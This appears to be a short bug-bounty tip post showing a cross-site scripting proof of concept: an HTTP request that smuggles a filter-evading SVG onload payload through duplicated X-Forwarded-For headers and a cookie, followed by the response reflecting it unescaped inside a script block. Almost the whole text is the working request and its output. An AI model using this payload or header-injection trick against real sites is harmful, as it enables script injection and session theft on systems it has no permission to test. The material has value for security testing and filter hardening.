finding xss into a hidden tricks 馃槈
GET /xxx/xx/xxx.xx/x.js?t=2021111121 HTTP/2
Host: example[.]com
X-Forwarded-For: xss
X-Forwarded-For: xss><svg/onload=globalThis[`al`+/ert/.source]`1`// X-Forwarded-For: >
Cookie: gdId=xss</script%20
result:
200 OK
...
guid="</script ","24.99.19.20","xss","xss><svg/onload=globalThis[`al`+/ert/.source]`1`//,">